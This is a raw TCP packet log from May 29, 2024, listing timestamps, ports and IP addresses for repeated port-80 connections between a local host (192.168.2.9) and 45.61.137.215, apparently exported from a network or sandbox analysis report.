May 29, 2024 15:43:52.294668913 CEST	49754	80	192.168.2.9	45.61.137.215
May 29, 2024 15:43:52.300724030 CEST	49754	80	192.168.2.9	45.61.137.215
May 29, 2024 15:43:52.305752993 CEST	80	49754	45.61.137.215	192.168.2.9
May 29, 2024 15:43:52.306535959 CEST	49754	80	192.168.2.9	45.61.137.215
May 29, 2024 15:43:52.311512947 CEST	80	49754	45.61.137.215	192.168.2.9
May 29, 2024 15:43:54.843964100 CEST	80	49754	45.61.137.215	192.168.2.9
May 29, 2024 15:43:54.843986034 CEST	80	49754	45.61.137.215	192.168.2.9
May 29, 2024 15:43:54.844032049 CEST	80	49754	45.61.137.215	192.168.2.9
May 29, 2024 15:43:54.844078064 CEST	80	49754	45.61.137.215	192.168.2.9
May 29, 2024 15:43:54.844088078 CEST	80	49754	45.61.137.215	192.168.2.9
May 29, 2024 15:43:54.844151974 CEST	80	49754	45.61.137.215	192.168.2.9
May 29, 2024 15:43:54.844172001 CEST	80	49754	45.61.137.215	192.168.2.9
May 29, 2024 15:43:54.844175100 CEST	49754	80	192.168.2.9	45.61.137.215
May 29, 2024 15:43:54.844175100 CEST	49754	80	192.168.2.9	45.61.137.215
May 29, 2024 15:43:54.844192028 CEST	80	49754	45.61.137.215	192.168.2.9
May 29, 2024 15:43:54.844204903 CEST	80	49754	45.61.137.215	192.168.2.9
May 29, 2024 15:43:54.844207048 CEST	49754	80	192.168.2.9	45.61.137.215
May 29, 2024 15:43:54.844207048 CEST	49754	80	192.168.2.9	45.61.137.215
May 29, 2024 15:43:54.844218969 CEST	80	49754	45.61.137.215	192.168.2.9
May 29, 2024 15:43:54.844228983 CEST	49754	80	192.168.2.9	45.61.137.215
May 29, 2024 15:43:54.844254971 CEST	49754	80	192.168.2.9	45.61.137.215
May 29, 2024 15:43:54.844254971 CEST	49754	80	192.168.2.9	45.61.137.215
May 29, 2024 15:43:54.844276905 CEST	49754	80	192.168.2.9	45.61.137.215
May 29, 2024 15:43:54.849385023 CEST	80	49754	45.61.137.215	192.168.2.9
May 29, 2024 15:43:54.849446058 CEST	80	49754	45.61.137.215	192.168.2.9
May 29, 2024 15:43:54.849481106 CEST	80	49754	45.61.137.215	192.168.2.9
May 29, 2024 15:43:54.849514008 CEST	80	49754	45.61.137.215	192.168.2.9
May 29, 2024 15:43:54.849575043 CEST	49754	80	192.168.2.9	45.61.137.215
May 29, 2024 15:43:54.849708080 CEST	80	49754	45.61.137.215	192.168.2.9
May 29, 2024 15:43:54.850604057 CEST	49754	80	192.168.2.9	45.61.137.215
May 29, 2024 15:43:55.196664095 CEST	49755	80	192.168.2.9	45.61.137.215
May 29, 2024 15:43:55.201813936 CEST	80	49755	45.61.137.215	192.168.2.9
May 29, 2024 15:43:55.201899052 CEST	49755	80	192.168.2.9	45.61.137.215
May 29, 2024 15:43:55.212846041 CEST	49755	80	192.168.2.9	45.61.137.215
May 29, 2024 15:43:55.217825890 CEST	80	49755	45.61.137.215	192.168.2.9
May 29, 2024 15:43:55.217894077 CEST	49755	80	192.168.2.9	45.61.137.215
May 29, 2024 15:43:55.222903967 CEST	80	49755	45.61.137.215	192.168.2.9
May 29, 2024 15:43:57.950268030 CEST	80	49755	45.61.137.215	192.168.2.9
May 29, 2024 15:43:57.950299025 CEST	80	49755	45.61.137.215	192.168.2.9
May 29, 2024 15:43:57.950335979 CEST	80	49755	45.61.137.215	192.168.2.9
May 29, 2024 15:43:57.950346947 CEST	80	49755	45.61.137.215	192.168.2.9
May 29, 2024 15:43:57.950357914 CEST	80	49755	45.61.137.215	192.168.2.9
May 29, 2024 15:43:57.950368881 CEST	80	49755	45.61.137.215	192.168.2.9
May 29, 2024 15:43:57.950368881 CEST	49755	80	192.168.2.9	45.61.137.215
May 29, 2024 15:43:57.950382948 CEST	80	49755	45.61.137.215	192.168.2.9
May 29, 2024 15:43:57.950392962 CEST	80	49755	45.61.137.215	192.168.2.9
May 29, 2024 15:43:57.950403929 CEST	49755	80	192.168.2.9	45.61.137.215
May 29, 2024 15:43:57.950427055 CEST	80	49755	45.61.137.215	192.168.2.9
May 29, 2024 15:43:57.950428963 CEST	49755	80	192.168.2.9	45.61.137.215
May 29, 2024 15:43:57.950438023 CEST	49755	80	192.168.2.9	45.61.137.215
May 29, 2024 15:43:57.950448036 CEST	49755	80	192.168.2.9	45.61.137.215
May 29, 2024 15:43:57.950453997 CEST	80	49755	45.61.137.215	192.168.2.9
May 29, 2024 15:43:57.950469971 CEST	49755	80	192.168.2.9	45.61.137.215
May 29, 2024 15:43:57.950515985 CEST	49755	80	192.168.2.9	45.61.137.215
May 29, 2024 15:43:57.955434084 CEST	80	49755	45.61.137.215	192.168.2.9
May 29, 2024 15:43:57.955446959 CEST	80	49755	45.61.137.215	192.168.2.9
May 29, 2024 15:43:57.955457926 CEST	80	49755	45.61.137.215	192.168.2.9
May 29, 2024 15:43:57.955492020 CEST	49755	80	192.168.2.9	45.61.137.215
May 29, 2024 15:43:57.955518007 CEST	49755	80	192.168.2.9	45.61.137.215
May 29, 2024 15:43:57.958561897 CEST	49755	80	192.168.2.9	45.61.137.215
May 29, 2024 15:43:58.188901901 CEST	49756	80	192.168.2.9	45.61.137.215
May 29, 2024 15:43:58.193945885 CEST	80	49756	45.61.137.215	192.168.2.9
May 29, 2024 15:43:58.198537111 CEST	49756	80	192.168.2.9	45.61.137.215
May 29, 2024 15:43:58.198556900 CEST	49756	80	192.168.2.9	45.61.137.215
May 29, 2024 15:43:58.203449965 CEST	80	49756	45.61.137.215	192.168.2.9
May 29, 2024 15:43:58.210539103 CEST	49756	80	192.168.2.9	45.61.137.215
May 29, 2024 15:43:58.215452909 CEST	80	49756	45.61.137.215	192.168.2.9
May 29, 2024 15:44:00.739684105 CEST	80	49756	45.61.137.215	192.168.2.9
May 29, 2024 15:44:00.739712000 CEST	80	49756	45.61.137.215	192.168.2.9
May 29, 2024 15:44:00.739722967 CEST	80	49756	45.61.137.215	192.168.2.9
May 29, 2024 15:44:00.739732981 CEST	80	49756	45.61.137.215	192.168.2.9
May 29, 2024 15:44:00.739743948 CEST	80	49756	45.61.137.215	192.168.2.9
May 29, 2024 15:44:00.739757061 CEST	80	49756	45.61.137.215	192.168.2.9
May 29, 2024 15:44:00.739788055 CEST	49756	80	192.168.2.9	45.61.137.215
May 29, 2024 15:44:00.739847898 CEST	49756	80	192.168.2.9	45.61.137.215
May 29, 2024 15:44:00.739876986 CEST	49756	80	192.168.2.9	45.61.137.215
May 29, 2024 15:44:00.739984989 CEST	80	49756	45.61.137.215	192.168.2.9
May 29, 2024 15:44:00.740019083 CEST	80	49756	45.61.137.215	192.168.2.9
May 29, 2024 15:44:00.740030050 CEST	80	49756	45.61.137.215	192.168.2.9
May 29, 2024 15:44:00.740041018 CEST	80	49756	45.61.137.215	192.168.2.9
May 29, 2024 15:44:00.740046024 CEST	49756	80	192.168.2.9	45.61.137.215
May 29, 2024 15:44:00.740087032 CEST	49756	80	192.168.2.9	45.61.137.215
May 29, 2024 15:44:00.740087986 CEST	49756	80	192.168.2.9	45.61.137.215
May 29, 2024 15:44:00.740124941 CEST	49756	80	192.168.2.9	45.61.137.215
May 29, 2024 15:44:00.744898081 CEST	80	49756	45.61.137.215	192.168.2.9
May 29, 2024 15:44:00.744915962 CEST	80	49756	45.61.137.215	192.168.2.9
May 29, 2024 15:44:00.744982004 CEST	49756	80	192.168.2.9	45.61.137.215
May 29, 2024 15:44:00.745054007 CEST	49756	80	192.168.2.9	45.61.137.215
May 29, 2024 15:44:00.745074034 CEST	80	49756	45.61.137.215	192.168.2.9
May 29, 2024 15:44:00.745131969 CEST	49756	80	192.168.2.9	45.61.137.215
May 29, 2024 15:44:00.745132923 CEST	80	49756	45.61.137.215	192.168.2.9
May 29, 2024 15:44:00.745258093 CEST	49756	80	192.168.2.9	45.61.137.215
May 29, 2024 15:44:00.924559116 CEST	49757	80	192.168.2.9	45.61.137.215
May 29, 2024 15:44:00.929591894 CEST	80	49757	45.61.137.215	192.168.2.9
May 29, 2024 15:44:00.930668116 CEST	49757	80	192.168.2.9	45.61.137.215
May 29, 2024 15:44:00.934566021 CEST	49757	80	192.168.2.9	45.61.137.215
May 29, 2024 15:44:00.939502001 CEST	80	49757	45.61.137.215	192.168.2.9
May 29, 2024 15:44:00.941057920 CEST	49757	80	192.168.2.9	45.61.137.215
May 29, 2024 15:44:00.946050882 CEST	80	49757	45.61.137.215	192.168.2.9
May 29, 2024 15:44:03.554755926 CEST	80	49757	45.61.137.215	192.168.2.9
May 29, 2024 15:44:03.554774046 CEST	80	49757	45.61.137.215	192.168.2.9
May 29, 2024 15:44:03.554785967 CEST	80	49757	45.61.137.215	192.168.2.9
May 29, 2024 15:44:03.554796934 CEST	80	49757	45.61.137.215	192.168.2.9
May 29, 2024 15:44:03.554809093 CEST	80	49757	45.61.137.215	192.168.2.9
May 29, 2024 15:44:03.554848909 CEST	49757	80	192.168.2.9	45.61.137.215
May 29, 2024 15:44:03.554920912 CEST	80	49757	45.61.137.215	192.168.2.9
May 29, 2024 15:44:03.554920912 CEST	49757	80	192.168.2.9	45.61.137.215
May 29, 2024 15:44:03.554934025 CEST	80	49757	45.61.137.215	192.168.2.9
May 29, 2024 15:44:03.554945946 CEST	80	49757	45.61.137.215	192.168.2.9
May 29, 2024 15:44:03.554949045 CEST	49757	80	192.168.2.9	45.61.137.215
May 29, 2024 15:44:03.554970980 CEST	49757	80	192.168.2.9	45.61.137.215
May 29, 2024 15:44:03.554999113 CEST	49757	80	192.168.2.9	45.61.137.215
May 29, 2024 15:44:03.555068970 CEST	49757	80	192.168.2.9	45.61.137.215
May 29, 2024 15:44:03.555242062 CEST	80	49757	45.61.137.215	192.168.2.9
May 29, 2024 15:44:03.555274963 CEST	80	49757	45.61.137.215	192.168.2.9
May 29, 2024 15:44:03.555279970 CEST	49757	80	192.168.2.9	45.61.137.215
May 29, 2024 15:44:03.555314064 CEST	49757	80	192.168.2.9	45.61.137.215
May 29, 2024 15:44:03.560314894 CEST	80	49757	45.61.137.215	192.168.2.9
May 29, 2024 15:44:03.560349941 CEST	80	49757	45.61.137.215	192.168.2.9
May 29, 2024 15:44:03.560359955 CEST	80	49757	45.61.137.215	192.168.2.9
May 29, 2024 15:44:03.560365915 CEST	49757	80	192.168.2.9	45.61.137.215
May 29, 2024 15:44:03.560400009 CEST	49757	80	192.168.2.9	45.61.137.215
May 29, 2024 15:44:03.560400009 CEST	49757	80	192.168.2.9	45.61.137.215
May 29, 2024 15:44:03.711843967 CEST	49758	80	192.168.2.9	45.61.137.215
May 29, 2024 15:44:03.717003107 CEST	80	49758	45.61.137.215	192.168.2.9
May 29, 2024 15:44:03.717072964 CEST	49758	80	192.168.2.9	45.61.137.215
May 29, 2024 15:44:03.719372988 CEST	49758	80	192.168.2.9	45.61.137.215
May 29, 2024 15:44:03.724258900 CEST	80	49758	45.61.137.215	192.168.2.9
May 29, 2024 15:44:03.724325895 CEST	49758	80	192.168.2.9	45.61.137.215
May 29, 2024 15:44:03.729181051 CEST	80	49758	45.61.137.215	192.168.2.9
May 29, 2024 15:44:06.246373892 CEST	80	49758	45.61.137.215	192.168.2.9
May 29, 2024 15:44:06.246393919 CEST	80	49758	45.61.137.215	192.168.2.9
May 29, 2024 15:44:06.246403933 CEST	80	49758	45.61.137.215	192.168.2.9
May 29, 2024 15:44:06.246414900 CEST	80	49758	45.61.137.215	192.168.2.9
May 29, 2024 15:44:06.246426105 CEST	80	49758	45.61.137.215	192.168.2.9
May 29, 2024 15:44:06.246436119 CEST	80	49758	45.61.137.215	192.168.2.9
May 29, 2024 15:44:06.246526957 CEST	49758	80	192.168.2.9	45.61.137.215
May 29, 2024 15:44:06.246526957 CEST	49758	80	192.168.2.9	45.61.137.215
May 29, 2024 15:44:06.246526957 CEST	49758	80	192.168.2.9	45.61.137.215
May 29, 2024 15:44:06.246598005 CEST	80	49758	45.61.137.215	192.168.2.9
May 29, 2024 15:44:06.246608019 CEST	80	49758	45.61.137.215	192.168.2.9
May 29, 2024 15:44:06.246618032 CEST	80	49758	45.61.137.215	192.168.2.9
May 29, 2024 15:44:06.246623993 CEST	49758	80	192.168.2.9	45.61.137.215
May 29, 2024 15:44:06.246629000 CEST	80	49758	45.61.137.215	192.168.2.9
May 29, 2024 15:44:06.246659994 CEST	49758	80	192.168.2.9	45.61.137.215
May 29, 2024 15:44:06.246660948 CEST	49758	80	192.168.2.9	45.61.137.215
May 29, 2024 15:44:06.246690989 CEST	49758	80	192.168.2.9	45.61.137.215
May 29, 2024 15:44:06.246690989 CEST	49758	80	192.168.2.9	45.61.137.215
May 29, 2024 15:44:06.251497984 CEST	80	49758	45.61.137.215	192.168.2.9
May 29, 2024 15:44:06.251653910 CEST	80	49758	45.61.137.215	192.168.2.9
May 29, 2024 15:44:06.251691103 CEST	80	49758	45.61.137.215	192.168.2.9
May 29, 2024 15:44:06.251781940 CEST	49758	80	192.168.2.9	45.61.137.215
May 29, 2024 15:44:06.251781940 CEST	49758	80	192.168.2.9	45.61.137.215
May 29, 2024 15:44:06.422692060 CEST	49759	80	192.168.2.9	45.61.137.215
May 29, 2024 15:44:06.427706003 CEST	80	49759	45.61.137.215	192.168.2.9
May 29, 2024 15:44:06.430778980 CEST	49759	80	192.168.2.9	45.61.137.215
May 29, 2024 15:44:06.434631109 CEST	49759	80	192.168.2.9	45.61.137.215
May 29, 2024 15:44:06.439502001 CEST	80	49759	45.61.137.215	192.168.2.9
May 29, 2024 15:44:06.442980051 CEST	49759	80	192.168.2.9	45.61.137.215
May 29, 2024 15:44:06.447859049 CEST	80	49759	45.61.137.215	192.168.2.9
May 29, 2024 15:44:07.392654896 CEST	49760	80	192.168.2.9	104.21.10.127
May 29, 2024 15:44:07.397641897 CEST	80	49760	104.21.10.127	192.168.2.9
May 29, 2024 15:44:07.397696972 CEST	49760	80	192.168.2.9	104.21.10.127
May 29, 2024 15:44:07.397794008 CEST	49760	80	192.168.2.9	104.21.10.127
May 29, 2024 15:44:07.402604103 CEST	80	49760	104.21.10.127	192.168.2.9
May 29, 2024 15:44:07.874742985 CEST	80	49760	104.21.10.127	192.168.2.9
May 29, 2024 15:44:07.874862909 CEST	49760	80	192.168.2.9	104.21.10.127
May 29, 2024 15:44:07.875263929 CEST	80	49760	104.21.10.127	192.168.2.9
May 29, 2024 15:44:07.875308037 CEST	49760	80	192.168.2.9	104.21.10.127
May 29, 2024 15:44:07.879776955 CEST	80	49760	104.21.10.127	192.168.2.9
May 29, 2024 15:44:09.020404100 CEST	80	49759	45.61.137.215	192.168.2.9
May 29, 2024 15:44:09.020417929 CEST	80	49759	45.61.137.215	192.168.2.9
May 29, 2024 15:44:09.020427942 CEST	80	49759	45.61.137.215	192.168.2.9
May 29, 2024 15:44:09.020437956 CEST	80	49759	45.61.137.215	192.168.2.9
May 29, 2024 15:44:09.020451069 CEST	80	49759	45.61.137.215	192.168.2.9
May 29, 2024 15:44:09.020503998 CEST	80	49759	45.61.137.215	192.168.2.9
May 29, 2024 15:44:09.020519018 CEST	49759	80	192.168.2.9	45.61.137.215
May 29, 2024 15:44:09.020556927 CEST	49759	80	192.168.2.9	45.61.137.215
May 29, 2024 15:44:09.020584106 CEST	80	49759	45.61.137.215	192.168.2.9
May 29, 2024 15:44:09.020603895 CEST	80	49759	45.61.137.215	192.168.2.9
May 29, 2024 15:44:09.020618916 CEST	80	49759	45.61.137.215	192.168.2.9
May 29, 2024 15:44:09.020628929 CEST	80	49759	45.61.137.215	192.168.2.9
May 29, 2024 15:44:09.020648956 CEST	49759	80	192.168.2.9	45.61.137.215
May 29, 2024 15:44:09.020648956 CEST	49759	80	192.168.2.9	45.61.137.215
May 29, 2024 15:44:09.020670891 CEST	49759	80	192.168.2.9	45.61.137.215
May 29, 2024 15:44:09.020670891 CEST	49759	80	192.168.2.9	45.61.137.215
May 29, 2024 15:44:09.020900965 CEST	49759	80	192.168.2.9	45.61.137.215
May 29, 2024 15:44:09.025584936 CEST	80	49759	45.61.137.215	192.168.2.9
May 29, 2024 15:44:09.025595903 CEST	80	49759	45.61.137.215	192.168.2.9
May 29, 2024 15:44:09.025605917 CEST	80	49759	45.61.137.215	192.168.2.9
May 29, 2024 15:44:09.025682926 CEST	49759	80	192.168.2.9	45.61.137.215
May 29, 2024 15:44:09.025934935 CEST	80	49759	45.61.137.215	192.168.2.9
May 29, 2024 15:44:09.026024103 CEST	49759	80	192.168.2.9	45.61.137.215
May 29, 2024 15:44:09.278132915 CEST	49761	80	192.168.2.9	45.61.137.215
May 29, 2024 15:44:09.283086061 CEST	80	49761	45.61.137.215	192.168.2.9
May 29, 2024 15:44:09.283165932 CEST	49761	80	192.168.2.9	45.61.137.215
May 29, 2024 15:44:09.285919905 CEST	49761	80	192.168.2.9	45.61.137.215
May 29, 2024 15:44:09.290796041 CEST	80	49761	45.61.137.215	192.168.2.9
May 29, 2024 15:44:09.290848970 CEST	49761	80	192.168.2.9	45.61.137.215
May 29, 2024 15:44:09.295686960 CEST	80	49761	45.61.137.215	192.168.2.9
May 29, 2024 15:44:11.849642992 CEST	80	49761	45.61.137.215	192.168.2.9
May 29, 2024 15:44:11.849659920 CEST	80	49761	45.61.137.215	192.168.2.9
May 29, 2024 15:44:11.849670887 CEST	80	49761	45.61.137.215	192.168.2.9
May 29, 2024 15:44:11.849680901 CEST	80	49761	45.61.137.215	192.168.2.9
May 29, 2024 15:44:11.849694014 CEST	80	49761	45.61.137.215	192.168.2.9
May 29, 2024 15:44:11.849735975 CEST	49761	80	192.168.2.9	45.61.137.215
May 29, 2024 15:44:11.849771976 CEST	80	49761	45.61.137.215	192.168.2.9
May 29, 2024 15:44:11.849782944 CEST	80	49761	45.61.137.215	192.168.2.9
May 29, 2024 15:44:11.849821091 CEST	49761	80	192.168.2.9	45.61.137.215
May 29, 2024 15:44:11.849821091 CEST	49761	80	192.168.2.9	45.61.137.215
May 29, 2024 15:44:11.849821091 CEST	49761	80	192.168.2.9	45.61.137.215
May 29, 2024 15:44:11.849867105 CEST	49761	80	192.168.2.9	45.61.137.215
May 29, 2024 15:44:11.849920988 CEST	80	49761	45.61.137.215	192.168.2.9
May 29, 2024 15:44:11.849942923 CEST	80	49761	45.61.137.215	192.168.2.9
May 29, 2024 15:44:11.849953890 CEST	80	49761	45.61.137.215	192.168.2.9
May 29, 2024 15:44:11.850016117 CEST	49761	80	192.168.2.9	45.61.137.215
May 29, 2024 15:44:11.850016117 CEST	49761	80	192.168.2.9	45.61.137.215
May 29, 2024 15:44:11.850016117 CEST	49761	80	192.168.2.9	45.61.137.215
May 29, 2024 15:44:11.854883909 CEST	80	49761	45.61.137.215	192.168.2.9
May 29, 2024 15:44:11.854912996 CEST	80	49761	45.61.137.215	192.168.2.9
May 29, 2024 15:44:11.854953051 CEST	49761	80	192.168.2.9	45.61.137.215
May 29, 2024 15:44:11.854988098 CEST	49761	80	192.168.2.9	45.61.137.215
May 29, 2024 15:44:12.002722025 CEST	49762	80	192.168.2.9	45.61.137.215
May 29, 2024 15:44:12.007693052 CEST	80	49762	45.61.137.215	192.168.2.9
May 29, 2024 15:44:12.007762909 CEST	49762	80	192.168.2.9	45.61.137.215
May 29, 2024 15:44:12.009845018 CEST	49762	80	192.168.2.9	45.61.137.215
May 29, 2024 15:44:12.014693975 CEST	80	49762	45.61.137.215	192.168.2.9
May 29, 2024 15:44:12.014758110 CEST	49762	80	192.168.2.9	45.61.137.215
May 29, 2024 15:44:12.019823074 CEST	80	49762	45.61.137.215	192.168.2.9
May 29, 2024 15:44:14.588062048 CEST	80	49762	45.61.137.215	192.168.2.9
May 29, 2024 15:44:14.588083982 CEST	80	49762	45.61.137.215	192.168.2.9
May 29, 2024 15:44:14.588115931 CEST	80	49762	45.61.137.215	192.168.2.9
May 29, 2024 15:44:14.588128090 CEST	80	49762	45.61.137.215	192.168.2.9
May 29, 2024 15:44:14.588138103 CEST	80	49762	45.61.137.215	192.168.2.9
May 29, 2024 15:44:14.588156939 CEST	80	49762	45.61.137.215	192.168.2.9
May 29, 2024 15:44:14.588169098 CEST	80	49762	45.61.137.215	192.168.2.9
May 29, 2024 15:44:14.588200092 CEST	49762	80	192.168.2.9	45.61.137.215
May 29, 2024 15:44:14.588200092 CEST	49762	80	192.168.2.9	45.61.137.215
May 29, 2024 15:44:14.588200092 CEST	49762	80	192.168.2.9	45.61.137.215
May 29, 2024 15:44:14.588217020 CEST	80	49762	45.61.137.215	192.168.2.9
May 29, 2024 15:44:14.588228941 CEST	80	49762	45.61.137.215	192.168.2.9
May 29, 2024 15:44:14.588396072 CEST	49762	80	192.168.2.9	45.61.137.215
May 29, 2024 15:44:14.588428020 CEST	49762	80	192.168.2.9	45.61.137.215
May 29, 2024 15:44:14.588428020 CEST	49762	80	192.168.2.9	45.61.137.215
May 29, 2024 15:44:14.588561058 CEST	80	49762	45.61.137.215	192.168.2.9
May 29, 2024 15:44:14.588766098 CEST	49762	80	192.168.2.9	45.61.137.215
May 29, 2024 15:44:14.593281984 CEST	80	49762	45.61.137.215	192.168.2.9
May 29, 2024 15:44:14.593316078 CEST	80	49762	45.61.137.215	192.168.2.9
May 29, 2024 15:44:14.593327999 CEST	80	49762	45.61.137.215	192.168.2.9
May 29, 2024 15:44:14.593338966 CEST	80	49762	45.61.137.215	192.168.2.9
May 29, 2024 15:44:14.593350887 CEST	49762	80	192.168.2.9	45.61.137.215
May 29, 2024 15:44:14.593383074 CEST	49762	80	192.168.2.9	45.61.137.215
May 29, 2024 15:44:14.593383074 CEST	49762	80	192.168.2.9	45.61.137.215
May 29, 2024 15:44:14.593383074 CEST	49762	80	192.168.2.9	45.61.137.215
May 29, 2024 15:44:14.753142118 CEST	49763	80	192.168.2.9	45.61.137.215
May 29, 2024 15:44:14.758316994 CEST	80	49763	45.61.137.215	192.168.2.9
May 29, 2024 15:44:14.758600950 CEST	49763	80	192.168.2.9	45.61.137.215
May 29, 2024 15:44:14.760596991 CEST	49763	80	192.168.2.9	45.61.137.215
May 29, 2024 15:44:14.765755892 CEST	80	49763	45.61.137.215	192.168.2.9
May 29, 2024 15:44:14.765880108 CEST	49763	80	192.168.2.9	45.61.137.215
May 29, 2024 15:44:14.770809889 CEST	80	49763	45.61.137.215	192.168.2.9
May 29, 2024 15:44:17.262957096 CEST	80	49763	45.61.137.215	192.168.2.9
May 29, 2024 15:44:17.262975931 CEST	80	49763	45.61.137.215	192.168.2.9
May 29, 2024 15:44:17.262986898 CEST	80	49763	45.61.137.215	192.168.2.9
May 29, 2024 15:44:17.263000011 CEST	80	49763	45.61.137.215	192.168.2.9
May 29, 2024 15:44:17.263010979 CEST	80	49763	45.61.137.215	192.168.2.9
May 29, 2024 15:44:17.263024092 CEST	80	49763	45.61.137.215	192.168.2.9
May 29, 2024 15:44:17.263044119 CEST	49763	80	192.168.2.9	45.61.137.215
May 29, 2024 15:44:17.263053894 CEST	80	49763	45.61.137.215	192.168.2.9
May 29, 2024 15:44:17.263077021 CEST	80	49763	45.61.137.215	192.168.2.9
May 29, 2024 15:44:17.263088942 CEST	80	49763	45.61.137.215	192.168.2.9
May 29, 2024 15:44:17.263089895 CEST	49763	80	192.168.2.9	45.61.137.215
May 29, 2024 15:44:17.263102055 CEST	80	49763	45.61.137.215	192.168.2.9
May 29, 2024 15:44:17.263109922 CEST	49763	80	192.168.2.9	45.61.137.215
May 29, 2024 15:44:17.263122082 CEST	49763	80	192.168.2.9	45.61.137.215
May 29, 2024 15:44:17.263132095 CEST	49763	80	192.168.2.9	45.61.137.215
May 29, 2024 15:44:17.263165951 CEST	49763	80	192.168.2.9	45.61.137.215
May 29, 2024 15:44:17.268073082 CEST	80	49763	45.61.137.215	192.168.2.9
May 29, 2024 15:44:17.268085957 CEST	80	49763	45.61.137.215	192.168.2.9
May 29, 2024 15:44:17.268098116 CEST	80	49763	45.61.137.215	192.168.2.9
May 29, 2024 15:44:17.268120050 CEST	49763	80	192.168.2.9	45.61.137.215
May 29, 2024 15:44:17.268151045 CEST	49763	80	192.168.2.9	45.61.137.215
May 29, 2024 15:44:17.268177032 CEST	49763	80	192.168.2.9	45.61.137.215
May 29, 2024 15:44:17.411242962 CEST	49764	80	192.168.2.9	45.61.137.215
May 29, 2024 15:44:17.416198015 CEST	80	49764	45.61.137.215	192.168.2.9
May 29, 2024 15:44:17.416277885 CEST	49764	80	192.168.2.9	45.61.137.215
May 29, 2024 15:44:17.418906927 CEST	49764	80	192.168.2.9	45.61.137.215
May 29, 2024 15:44:17.423759937 CEST	80	49764	45.61.137.215	192.168.2.9
May 29, 2024 15:44:17.423820972 CEST	49764	80	192.168.2.9	45.61.137.215
May 29, 2024 15:44:17.428716898 CEST	80	49764	45.61.137.215	192.168.2.9
May 29, 2024 15:44:20.001450062 CEST	80	49764	45.61.137.215	192.168.2.9
May 29, 2024 15:44:20.001477957 CEST	80	49764	45.61.137.215	192.168.2.9
May 29, 2024 15:44:20.001490116 CEST	80	49764	45.61.137.215	192.168.2.9
May 29, 2024 15:44:20.001502037 CEST	80	49764	45.61.137.215	192.168.2.9
May 29, 2024 15:44:20.001513958 CEST	80	49764	45.61.137.215	192.168.2.9
May 29, 2024 15:44:20.001524925 CEST	80	49764	45.61.137.215	192.168.2.9
May 29, 2024 15:44:20.001534939 CEST	80	49764	45.61.137.215	192.168.2.9
May 29, 2024 15:44:20.001543999 CEST	80	49764	45.61.137.215	192.168.2.9
May 29, 2024 15:44:20.001554012 CEST	80	49764	45.61.137.215	192.168.2.9
May 29, 2024 15:44:20.001565933 CEST	80	49764	45.61.137.215	192.168.2.9
May 29, 2024 15:44:20.001569033 CEST	49764	80	192.168.2.9	45.61.137.215
May 29, 2024 15:44:20.001658916 CEST	49764	80	192.168.2.9	45.61.137.215
May 29, 2024 15:44:20.001658916 CEST	49764	80	192.168.2.9	45.61.137.215
May 29, 2024 15:44:20.001658916 CEST	49764	80	192.168.2.9	45.61.137.215
May 29, 2024 15:44:20.001660109 CEST	49764	80	192.168.2.9	45.61.137.215
May 29, 2024 15:44:20.001660109 CEST	49764	80	192.168.2.9	45.61.137.215
May 29, 2024 15:44:20.001660109 CEST	49764	80	192.168.2.9	45.61.137.215
May 29, 2024 15:44:20.001714945 CEST	49764	80	192.168.2.9	45.61.137.215
May 29, 2024 15:44:20.006683111 CEST	80	49764	45.61.137.215	192.168.2.9
May 29, 2024 15:44:20.006712914 CEST	80	49764	45.61.137.215	192.168.2.9
May 29, 2024 15:44:20.006724119 CEST	80	49764	45.61.137.215	192.168.2.9
May 29, 2024 15:44:20.006733894 CEST	80	49764	45.61.137.215	192.168.2.9
May 29, 2024 15:44:20.006741047 CEST	49764	80	192.168.2.9	45.61.137.215
May 29, 2024 15:44:20.006795883 CEST	49764	80	192.168.2.9	45.61.137.215
May 29, 2024 15:44:20.006795883 CEST	49764	80	192.168.2.9	45.61.137.215
May 29, 2024 15:44:20.216856003 CEST	49765	80	192.168.2.9	45.61.137.215
May 29, 2024 15:44:20.221915960 CEST	80	49765	45.61.137.215	192.168.2.9
May 29, 2024 15:44:20.222706079 CEST	49765	80	192.168.2.9	45.61.137.215
May 29, 2024 15:44:20.226591110 CEST	49765	80	192.168.2.9	45.61.137.215
May 29, 2024 15:44:20.231723070 CEST	80	49765	45.61.137.215	192.168.2.9
May 29, 2024 15:44:20.234719992 CEST	49765	80	192.168.2.9	45.61.137.215
May 29, 2024 15:44:20.239739895 CEST	80	49765	45.61.137.215	192.168.2.9
May 29, 2024 15:44:22.770471096 CEST	80	49765	45.61.137.215	192.168.2.9
May 29, 2024 15:44:22.770488977 CEST	80	49765	45.61.137.215	192.168.2.9
May 29, 2024 15:44:22.770509958 CEST	80	49765	45.61.137.215	192.168.2.9
May 29, 2024 15:44:22.770519972 CEST	80	49765	45.61.137.215	192.168.2.9
May 29, 2024 15:44:22.770531893 CEST	80	49765	45.61.137.215	192.168.2.9
May 29, 2024 15:44:22.770565033 CEST	49765	80	192.168.2.9	45.61.137.215
May 29, 2024 15:44:22.770653009 CEST	49765	80	192.168.2.9	45.61.137.215
May 29, 2024 15:44:22.770726919 CEST	49765	80	192.168.2.9	45.61.137.215
May 29, 2024 15:44:22.771187067 CEST	80	49765	45.61.137.215	192.168.2.9
May 29, 2024 15:44:22.771245956 CEST	80	49765	45.61.137.215	192.168.2.9
May 29, 2024 15:44:22.771256924 CEST	80	49765	45.61.137.215	192.168.2.9
May 29, 2024 15:44:22.771265984 CEST	49765	80	192.168.2.9	45.61.137.215
May 29, 2024 15:44:22.771318913 CEST	49765	80	192.168.2.9	45.61.137.215
May 29, 2024 15:44:22.771318913 CEST	49765	80	192.168.2.9	45.61.137.215
May 29, 2024 15:44:22.771342039 CEST	80	49765	45.61.137.215	192.168.2.9
May 29, 2024 15:44:22.771449089 CEST	49765	80	192.168.2.9	45.61.137.215
May 29, 2024 15:44:22.771472931 CEST	80	49765	45.61.137.215	192.168.2.9
May 29, 2024 15:44:22.773118973 CEST	49765	80	192.168.2.9	45.61.137.215
May 29, 2024 15:44:22.775613070 CEST	80	49765	45.61.137.215	192.168.2.9
May 29, 2024 15:44:22.775629997 CEST	80	49765	45.61.137.215	192.168.2.9
May 29, 2024 15:44:22.775643110 CEST	80	49765	45.61.137.215	192.168.2.9
May 29, 2024 15:44:22.775654078 CEST	80	49765	45.61.137.215	192.168.2.9
May 29, 2024 15:44:22.775681019 CEST	49765	80	192.168.2.9	45.61.137.215
May 29, 2024 15:44:22.775706053 CEST	49765	80	192.168.2.9	45.61.137.215
May 29, 2024 15:44:22.775706053 CEST	49765	80	192.168.2.9	45.61.137.215
May 29, 2024 15:44:22.938193083 CEST	49766	80	192.168.2.9	45.61.137.215
